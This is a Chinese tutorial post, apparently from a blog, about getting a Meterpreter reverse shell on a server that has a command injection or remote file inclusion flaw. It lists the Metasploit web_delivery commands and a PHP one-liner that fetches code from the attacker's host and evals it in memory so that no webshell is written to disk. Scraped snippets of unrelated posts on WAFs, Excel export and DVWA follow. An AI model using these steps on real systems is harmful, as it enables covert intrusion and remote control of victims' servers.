代码注入/文件包含 弹出Meterpreter

主要通过 msf 中 exploit 的 web_delivery 模块来实现此功能

0x01 前提背景

目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息

解决思路:让目标设备从远端服务器加载webshell代码至内存执行

0x02 实现方法

使用 msf 中 exploit 的 web_delivery 模块:

此模块支持在本地监听一个端口,别人一旦访问该端口就会将该端口内的文件读取至本地执行(把webshell放在该端口下刚刚好)。

具体使用步骤:

2.1 通过php来实现

前提:目标服务器能够解析php

use exploit/multi/script/web_delivery
set target PHP
set payload php/meterpreter/reverse_tcp    ====>选择php写的meterpreter
set lhost 172.20.163.160
set lport 1111
run

运行成功后显示(只需让目标设备在系统命令下执行标红部分命令就可得到对方shell):

利用方式:

#命令注入漏洞
在注入点注入:php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.20.163.160:1111/OgsOFaj3yKH'));"

#远程文件包含漏洞
在包含漏洞处包含:http://172.20.163.160:1111/OgsOFaj3yKH

2.2 通过powershell来实现

2.3 其他

还有可借助其他脚本来实现:

0x03 参考链接

https://xz.aliyun.com/t/6920
https://www.cnblogs.com/baihualin/p/10509948.html

原文地址:https://www.cnblogs.com/-mo-/p/12047331.html

时间: 2024-08-30 02:43:45

代码注入/文件包含 弹出Meterpreter的相关文章

黄聪:PHP 防护XSS,SQL,代码执行,文件包含等多种高危漏洞

版本:v1.1更新时间:2013-05-25更新内容:优化性能功能说明: 可以有效防护XSS,sql注射,代码执行,文件包含等多种高危漏洞. 使用方法: 将waf.php传到要包含的文件的目录 在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码就可以做到页面防注入.跨站 复制代码 require_once('waf.php'); 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php,来调用本代码.常用php系统添加文件 PHPC

JavaWeb项目导出Excel文件并弹出下载框

引言 在Java Web开发中经常涉及到报表,最近做的项目中需要实现将数据库中的数据显示为表格,并且实现导出为Excel文件的功能. 相关jar包 使用POI可以很好的解决Excel的导入和导出的问题,POI下载地址: poi-3.6-20091214.jar 关键代码 首先导入上述jar包. 在生成excel时一般数据源形式为一个List,下面把生成Excel格式的代码贴出来: /** * 以下为生成Excel操作 */ // 1.创建一个workbook,对应一个Excel文件 HSSFWo

VS C# .NET WebBrowser控件 利用插入JS代码,实现控制弹出IE窗口

最近在做一个客户端程序,使用到自带的WebBrowser控件时,发现当JS调用window.open()或a标签的target="_blank"时使用的是弹出IE窗口,不知道为什么是这种设计,根本不满足需求嘛.上网查了一下相关资料,发现这个控件并没有属性能控制这个功能,于是找第三方控件,发现也还是不行(可能是我不够仔细尝试),而且要多出个几十兆的DLL.经过我几个小时的努力,放弃了...! 知道C#是可以与网页的JS交互的,于是想到网页上重写window.open()的方法,建一个HT

dvwa——命令注入&文件包含

命令注入 commond_injection 源码.分析.payload: low: <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exe

Dephi中安装&quot;dpk&quot;包文件时弹出&quot;.. because it is not a design time package&quot;的对话框.

描述: Dephi中使用"dpk"包文件时点击"Compile"成功,点击"Install"弹出"dcGDIPlusD7.bpl can’t be installed because it is not a design time package"的对话框,怎么解决?这外包文件是从网上下的一个包文件. 解决方法: 在"Compile"和"Install"旁边有一个options点开后,选

字符串导出xml文件并弹出下载对话框

转自:https://blog.csdn.net/zhandingfeng/article/details/53887354 导出单个xml文件:[java] view plain copy      List<Emr_cda_standard_ntDTO>  resultList = gxwdgfDAO.queryXmlContent(bean,inputData);//字符串来源                            HttpServletResponse response

jquery.form.js上传文件ie弹出下载文件解决办法

在ie下如果返回类型为jsonresult,ie老版本无法识别json类型,默认将会采用下载或者打开文件! 如果使用mvc的话.直接修改action返回类型为string即可,例如:return JsonConvert.SerializeObject(new { url = "", error = "请选择文件" });

用C#用C#实现窗体在规定时间弹出,例如:10:00.弹出后关闭。并在5分钟后再次弹出。5次后停止。最好有具体代码实现窗体在规定时间弹出,例如:10:00.弹出后关闭。并在5分钟后再次弹出。5次后停止。最好有具体代码

run(){        while(true)        {                show();                if(条件)                {                        break:                }                sleep(5*60*1000);//暂停5分钟        }}thread Brun(){        while(true)        {               

Xilium.CefGlue CEF Chrome 自动上传文件不弹出对话框 CefDialogHandler

关键代码如下,如何使用Handler,还不清楚的请继续搜索 internal sealed class WyzCefDialogHandler : CefDialogHandler    {               protected override bool OnFileDialog(CefBrowser browser, CefFileDialogMode mode, string title, string defaultFilePath, string[] acceptFilter